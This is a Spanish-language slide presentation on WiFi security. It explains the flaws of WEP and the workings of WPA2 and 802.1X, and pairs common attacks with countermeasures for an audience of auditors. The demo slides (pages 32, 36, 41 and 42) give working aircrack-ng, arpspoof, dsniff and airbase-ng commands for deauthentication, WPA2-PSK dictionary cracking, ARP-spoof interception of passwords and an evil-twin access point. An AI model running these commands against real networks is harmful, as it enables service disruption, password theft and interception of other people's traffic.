Seguridad wifi

45
Seguridad en redes WiFi Consideraciones de Seguridad, Ataques Habituales y Contramedidas Kuko Armas <[email protected]>

Transcript of Seguridad wifi

Page 1: Seguridad wifi

Seguridad en redes WiFi

Consideraciones de Seguridad, Ataques Habituales y

Contramedidas

Kuko Armas <[email protected]>

Page 2: Seguridad wifi

802.11 - 1997

¡¡Llegó la WiFi!! (y llegaron los problemas)

Page 3: Seguridad wifi

2.4GHz vs 5 GHz

2.4 GHz 5 GHz

802.11b/g/n 802.11a/n/ac

Mayor Alcance Menor alcance

Cualquier dispositivo Menos compatible

3 canales no solapados 24 canales no solapados

Congestionado con WIFI Menos congestión con WIFI

Muchas interferencias externas Muy pocas interferencias externas

Page 4: Seguridad wifi

¿Por que solo 3 canales?

... si yo he visto hasta 14...

● Universal: 1,6,11● Europa: 1,5,9,13

Page 5: Seguridad wifi

Interferencias WIFI

● Mismo canal: Canal 1 y Canal 6● Canal solapado: Canales 11 y 13

Page 6: Seguridad wifi

Interferencias Externas

Sin un analizador de espectro no podemos verlas, y nuestra WiFi funcionará mal

Page 7: Seguridad wifi

Los (tristes) inicios

(In)Seguridad WIFI (antes de 802.11i - 2004)

Page 8: Seguridad wifi

Autenticación

● Open System● Realmente no hay autenticación● Solo se verifica la compatibilidad

● Shared Key● Realmente es PEOR que el anterior (si, en serio)● Envía un desafío en texto claro. Facilita el ataque a

la clave WEP● No sólo afecta a autenticación, también a cifrado

Page 9: Seguridad wifi

WEP (¿Es un chiste?)

● Wired Equivalent Privacy. Un nombre desafortunado● 64 o 128 bits (24 bits de IV). Usa RC4● El IV se envía en plano

● Sólo tenemos 24 bits de IV. El IV se repiten cada 2^24 tramas (5 horas con tráfico)

● Weak Key Attack: RC4 genera claves débiles● Reinjection Attack: para acelerar la colisión de IV● Bit-Flipping Attack: El CRC es considerado débil, lo

que permite modificar un paquete sin que el ICV lo detecte

● Combinando los ataques anteriores, se puede romper el cifrado WEP en menos de 5 minutos

Page 10: Seguridad wifi

Filtros por MAC

● Control de acceso por dirección física (MAC)● No definido en estándar, pero implementado por fabricantes● Gestión engorrosa (aunque es posible centralizar con Radius)● No es seguro, modificar una MAC es TRIVIAL

Page 11: Seguridad wifi

Redes “Invisibles” (SSID Cloack)

● Las redes se anuncian mediante paquetes “beacon”● Para "ocultar" la red, el ESSID puede ir a NULL● Passive/Active Scanning (Beacon/Probe)● El AP responderá con el ESSID a cualquier cliente que ponga el ESSID en el probe● Con un sniffer o analizador de protocolo se descubre la red "oculta" de forma inmediata● "Seguridad por desconocimiento" -> Mala seguridad● No esta definido en el estándar. Depende de la implementación del fabricante

Page 12: Seguridad wifi

El presente

802.11i (2004) y 802.11-2012

Page 13: Seguridad wifi

“Amendment” 802.11i – 2004

● Introduce nuevas soluciones para Autenticación y Cifrado● Incluído en Estándar 802.11-2007 y posteriores● Fué adoptado por fabricantes antes de ratificarse. La WIFI Alliance lo definió como WPA (WIFI Protected Access)● Una vez ratificado, la WIFI Alliance definió WPA2

Page 14: Seguridad wifi

Mejoras introducidas en 802.11i

● Robust Network Security: Nueva máquina de estados● Autenticación: Se añade 802.1X/EAP● Cifrado: Nuevos algoritmos y protocolos

● Intercambio de claves: 4-Way Handshake● Cifrado: TKIP/RC4 y CCMP/AES

Page 15: Seguridad wifi

Robust Network Security

● Todo el tráfico esta cifrado y autenticado● RNSA: RNS Association

● Se utilizan 2 claves “maestras” generadas durante la autenticación

● Pairwise Master Key: unicast● Group Master Key: broadcast / multicast

● Con las anteriores, se generan claves temporales usadas para cifrar:

● Pairwise Transient Key: unicast● Group Transient Key: broadcast /

multicast● Estas ultimas se generan mediante el 4-Way Handshake

Page 16: Seguridad wifi

802.1X/EAP (WPA2/Enterprise)

● No es una tecnología WIFI (también para redes cableadas)● Componentes

● Supplicant: Dispositivo Wifi● Authenticator: AP Wifi● Authentication server: Servidor Radius

● Varios tipos de EAP (algunos inseguros)● LEAP: No estándar e inseguro, NO USAR● EAP-TLS: Estándar, basada en certificados digitales● PEAP: Estándar y seguro (Tunel TLS. Autenticación

del servidor con certificado digital)

Page 17: Seguridad wifi

802.1X/PEAP (WPA2/Enterprise)

Page 18: Seguridad wifi

PreShared Key: WPA2/Personal

● Se realiza el 4-Way Handshake a partir de una clave compartida previamente (PSK)● WPA: Antes de la ratificación

● TKIP/RC4● WPA2: Después de la ratificación

● TKIP/RC4● CCMP/AES

● DPSK: Dynamic PSK (claves compartidas diferentes para cada cliente)

● Resuelve los problemas de PSK sin la complejidad de 802.1X

● No esta definido en el estándar● Pocos fabricantes lo tienen

Page 19: Seguridad wifi

4-Way handshake

Partimos de las claves maestras:● En 802.1X la PMK se intercambia en la autenticación y es DISTINTA para cada usuario● En WPA2/Personal (PSK), la PMK se deriva de la clave compartida

O cómo crear claves de cifrado de forma segura...

Page 20: Seguridad wifi

Consideraciones adicionales

Otras consideraciones

de seguridad

Page 21: Seguridad wifi

Otras consideraciones

● Segmentación de trafico● VLANs: Por ESSID u por usuario (Radius)● RBAC: Usuarios, roles y permisos

● Seguridad de la infraestructura● Seguridad física● Seguridad de interfaz de gestión

● Redes Privadas Virtuales (VPN): Siempre que estemos en redes publicas

Page 22: Seguridad wifi

Guest WLAN

● Deben mapearse a una VLAN especifica aislada● Debe protegerse mediante firewalls que bloqueen el acceso a las redes de la organización● No debe permitirse el acceso a los equipos WIFI● Permitir sólo servicios controlados● Aislamiento de clientes● Captive Web Portal: Autenticación y aceptación de condiciones● Gestión de invitados: Creación dinámica de usuarios, etc

Page 23: Seguridad wifi

Ataques a redes WIFI

Ataques habituales y

contramedidas

Page 24: Seguridad wifi

Particularidades

● Acceso físico y alcance no delimitado● Universalidad y Ubiquidad (y va a más)● Cualquier red pública (Internet, Cybers, WIFI, etc) es un “entorno hostil”● Desconocimiento de los riesgos● Los dispositivos no siempre muestran la información necesaria para protegerse● Se sacrifica la “seguridad” por la “usabilidad”● Lo siento, pero.... ¡¡¡Falta de Sentido Común!!!

Page 25: Seguridad wifi

Atacante vs Auditor

Atacante:● Software: Kali Linux o similar● Hardware: Adaptadores WIFI “avanzados”● Un poco de “cerebro” (tampoco demasiado)

Auditor:● Las mismas herramientas que el atacante● Herramienta de análisis del medio físico (analizador de espectro)● Algo más de cerebro que el atacante (el auditor debe entender cómo funcionan los ataques)

Page 26: Seguridad wifi

Descubrimiento, Análisis y Escuchas Ilegales

● Medio compartido en frecuencia libre● Cualquiera tiene acceso● A menudo redes sin protección● PSK global (fácil acceso o ingeniería social)● Herramientas de monitorización y descubrimiento (WIFI e IP)● Donde esta el limite?● Herramientas de descubrimiento y analisis

● WIFI: WifiAnalyzer, InSSIDer, WiFiFoFum, WIFI Scanner, etc

● Red: Analizadores de protocolo (WireShark, EyePA, etc)

Page 27: Seguridad wifi

Ataques DoS

Ataques de Denegación de Servicio (DoS)

Page 28: Seguridad wifi

Denial of Service (DoS)

● Físico: Ataque al medio de transmisión ● Se detecta con analizador de espectro● Intencionado: WIFI Jammer● Accidental: interferencias

● Lógico: ● Se detecta con analizador de protocolo o WIDS● Varios tipo: Assoc flood, Auth Flood, PS-Poll flood,

Virtual carrier attack, DeAuth

Contramedidas● Físico: No existen. Monitorización● Lógico: 802.11w Management Frame Protection

Page 29: Seguridad wifi

DoS Físico

Ataque: WIFI Jammer

Interferencia: Transmisor A / V

Solo se detecta con analizador de espectro

Page 30: Seguridad wifi

Interferencias WIFI (2.4 vs 5 GHz)

Page 31: Seguridad wifi

Interferencias no WIFI

Hay tres tipos de interferencia

● Mismo canal: MALA● Canal solapado: MUY MALA● No WIFI: MUY MALA

Page 32: Seguridad wifi

DEMO: DoS Lógico (Deauth)

● Activamos modo monitor● airodump­ng start wlan0

● Monitorizamos trafico● airodump­ng mon0

● Seleccionamos victima MAC y BSSID● Enviamos deauth

● aireplay­ng ­­deauth 1 ­a BSSID ­c MAC_VICTIMA mon0● O continuo (de MUY mal gusto)

Page 33: Seguridad wifi

Ataques a Infraestructura

Ataques a Infraestructura

WIFI

Page 34: Seguridad wifi

Rogue AP (AP no autorizados)

● Accidental o intencionado● Acceso a la red cableado sin restricciones● OJO con las conexiones Ad-hoc en equipos conectados a la red

Contramedidas:● Seguridad en red cableada (802.1X y 802.1AE)● Monitorización y detección (WIDS/WIPS)

Page 35: Seguridad wifi

Ataques al cifrado

● Acceso a la infraestructura (riesgo similar a Rogue AP)● También abre la puerta a ataques peer to peer● WPA2/Personal (PSK) vulnerable a ataque de diccionario (DEMO)● 802.1X/EAP: LEAP vulnerable, NO USAR

● Usar certificados autofirmados o con CA propia!

Contramedidas● No usar PSK (Usar 802.11X o DPSK)● Si no queda mas remedio, usar claves largas y

complicadas● !a@s#d$f%g555 !@#$%1234pacr1234!@#$%

Page 36: Seguridad wifi

DEMO: Ataque a cifrado WPA2/PSK

●Activamos modo monitor● airodump-ng start wlan0

● Monitorizamos trafico para elegir la victima● airodump-ng mon0

● Necesitamos capturar un 4-Way Handshake de esa estación

● airodump-ng --bssid BSSID --channel CANAL -w psk mon0● Desconectamos a la victima para forzar un handshake

● aireplay-ng --deauth 1 -a BSSID -c MAC_VICTIMA mon0● Una vez capturado el handshake podemos lanzar el ataque de diccionario

● aircrack-ng -w rockyou.txt psk-01.cap

Page 37: Seguridad wifi

Otros ataques

● MAC Spoofing (no ARP spoof)● Ataque a filtros por MAC● Falsa sensación de seguridad● Trivial

● Management Interface Exploits● Ataque a infraestructuras mediante los protocolos de

gestión

Contramedidas ● No usar filtros MAC como única medida de seguridad

(ni en WIFI, ni en nada)● No permitir acceso de gestión desde redes no

confiables

Page 38: Seguridad wifi

Ataques al usuario

Ataques al usuario WIFI

Page 39: Seguridad wifi

Ataques Peer to Peer (a usuarios)

● Redes Ad-hoc● Redes públicas (o semipúblicas)● Mismo segmento de red (nivel 2)

Contramedidas● Protección particular (firewall)● Utilización de VPN en redes publicas● Aislamiento de clientes

Page 40: Seguridad wifi

WIFI Hijack● ARP Spoof:

● Necesitamos estar en la misma red que la víctima● Permite capturar trafico destinado a otra máquina

● Evil twin:● Mismo ESSID (y BSSID) que el "legitimo"

● Man in the Middle (MITM): No necesariamente WIFI● Capturas de trafico, claves, imágenes, etc● Ataques MITM a SSL (webmitm y sslstrip)

Contramedidas:● AP publico "falso": Usar siempre VPN● Evil Twin: Usar 802.1X/EAP● ARP Spoof: Protección ARP spoof● MITM en general: En red publica usar VPN

Page 41: Seguridad wifi

DEMO: ARP Spoof y MITM

● Activamos enrutado● echo 1 > /proc/sys/net/ipv4/ip_forward

● Escaneo la red y elijo a la victima● nmap -sP 192.168.43.1/24

● ARP Spoof● arpspoof -i wlan1 -r -t IP_VICTIMA IP_ROUTER

● Ojo con iptables, permitir todo el trafico● Capturar url

● urlsnarf -i wlan1● Capturar imagenes

● driftnet -i wlan1● Capturar claves

● dsniff -i wlan1

Page 42: Seguridad wifi

Demo “Evil Twin”

● Seleccionamos el ESSID que queremos atacar● Preparamos una configuración DHCP similar a la de la red "real"● Levantamos el AP falso

● airbase-ng --essid ESSID mon0● Levantamos el interfaz at0 con la misma IP que la red "real"

● ifconfig at0 192.168.43.1 netmask 255.255.255.0 up● Levantamos el dhcp

● dhcpd at0 -f● Nos anunciamos con mas potencia que el AP “victima”● Forzamos desconexión de la/s victimas

Page 43: Seguridad wifi

Ataques MITM

Ataques “Hombre en el Medio” (MITM)

Page 44: Seguridad wifi

Ataques MITM

● Consiste en “situarse” en el medio de las comunicaciones de la victima● Necesario para capturar tráfico cifrado

DEMO: ● webmitm

● Interceptamos las conexiones SSL y “suplantamos” al servidor de destino para capturar el trafico cifrado

● Sslstrip● Modifica los enlaces a paginas seguras (HTTPS)

para que sigan usando conexiones inseguras (HTTP)

Page 45: Seguridad wifi

Wi..FiN

Wi...FiNGracias por su

atención......si siguen ahí...

Kuko Armas <[email protected]>